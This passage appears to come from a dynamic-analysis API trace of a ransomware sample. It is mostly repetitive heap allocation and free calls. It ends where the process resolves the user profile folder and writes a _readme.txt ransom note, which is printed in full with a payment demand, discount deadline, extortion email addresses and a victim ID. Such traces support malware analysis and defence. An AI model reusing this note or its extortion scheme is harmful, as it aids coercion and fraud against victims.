Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.799] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.799] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.801] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.801] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608ae0 [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.801] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.801] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.801] PathFindFileNameW (pszPath="") returned="" [0165.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.801] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.801] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.802] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.802] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.802] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0165.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.802] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0165.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.802] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact 